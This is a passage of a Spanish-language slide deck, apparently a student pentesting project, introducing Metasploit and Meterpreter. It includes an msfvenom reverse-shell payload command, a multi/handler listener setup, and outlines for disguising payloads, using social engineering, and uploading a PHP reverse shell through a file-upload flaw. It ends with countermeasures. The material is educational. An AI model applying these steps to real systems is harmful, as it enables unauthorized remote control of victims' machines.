3. 1. Introducción
- Comprometer sistemas y servicios mediante malware.
- Paso a paso con ejemplos prácticos.
- Demostración práctica.
Sir Francis Bacon. - “El conocimiento es poder”
3
4. 1.1 Introducción Seguridad
-Tipos de hackers:
1) Hacker Sombrero blanco:
- Encontrar vulnerabilidades para reportarlas.
- Actuar bajo permiso.
- No hacer daño.
“El término ‘hacker’ es algo digno de admirar”
Chema Alonso.
4Imagen 1: José María Alonso (CDO Telefónica)
5. 1.1 Introducción Seguridad
-Tipos de hackers:
2) Hacker de sombrero negro:
- Violar el código ético de la seguridad informática.
- Actuar para beneficio propio.
- Causar el mayor daño posible.
“Un fantasma en el sistema”
Kevin Mitnick
5Imagen 2: Kevin Mitnick
6. 1.2 Sistema informático
HARDWARE:
- Necesitaremos hacer uso de la distribución de debian Kali-Linux o
Parrot Security OS.
- Partición de 40GB EXT4y 2GB de SWAP.
- Procesador Quad-Core 64 bits.
¿Porque Kali-Linux o Parrot?
6Imagen 3: Instalación gráfica Live-CD
7. 1.2 Sistema informático
SOFTWARE
- Agregar los repositorios necesarios de Kali.
- Utilizar herramienta “Terminator”.
7Imagen 5: Herramienta Terminator (Kali)
8. 1.3 Introducción Metasploit Framework
● Que es Metasploit Framework.
● Labor que realiza MSF en el pentesting.
● Herramienta de pago o código abierto.
8Imagen 7: Ninja Metasploit (ASCII)
Imagen 6: H.D Moore Autor Metasploit
11. 2.2 Módulos
11Imagen 10: Inicio Metasploit Framework (KALI)
- Exploits: Fragmentos del software.
- Payloads: Carga que se ejecutará en la vulnerabilidad (Meterpreter).
- Nops: Ejecutar el payload satisfactoriamente en la memoria.
- Codificadores: Codificar la firma.
- Auxiliares: Vía de recolección de información.
12. 2.3 Ataques con payloads
12
Imagen 11: Comando msfvenom (KALI)
“MSFVENOM”
- Generador de payloads
- Asociado a una reverse shell
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP
Address> LPORT=<Tu Puerto> -f <formato> > fichero.*
13. 2.3 Ataques con payloads
METERPRETER
- abreviatura de The Meta-Interpreter.
- Se ejecuta completamente en memoria.
- Controlar el host de un dispositivo mediante VNC.
Imagen 12: Ejecución shell Meterpreter (KALI) 13
14. 2.3 Ataques con payloads
Configurar Payload
- use exploit/multi/handler (Acceso rápido backdoor)
- set lhost <IP>
- set lport <port>
- Run/Exploit (Escucha)
Imagen 13: Configurando payload (KALI) 14
15. 2.3 Ataques con payloads
Ejecución Ataque vía scripting:
- Víctima tiene que ejecutar nuestro payload.
- Camuflar el payload.
- Ingeniería social.
Imagen 17: Ejecutando payload (Atacante) 15
16. 2.3 Ataques con payloads
Ejecución Ataque vía web (PHP):
- Encontrar vulnerabilidad de subida de ficheros.
- Camuflar el payload (jpeg, png, gif).
- Enviar directamente el malware en php.
16
Imagen 15: Vulnerabilidad subida ficheros (Servidor) Imagen 16: Reverse shell (Atacante)
23. 2.5 Contramedidas
Protegernos de un ataque:
- La actualización del sistema operativo y de aquellas aplicaciones más
vulnerables.
- Antivirus que sea capaz de detectar este tipo de scripts maliciosos.
- Monitorizar la red para localizar puertos TCP extraños.
23
Imagen 19: Bitdefender
24. 3. Conclusión
- Ampliación de conocimientos en ciberseguridad.
- Entender la importancia de la herramienta.
- Configuraciones y fallos a lo largo del proyecto.
24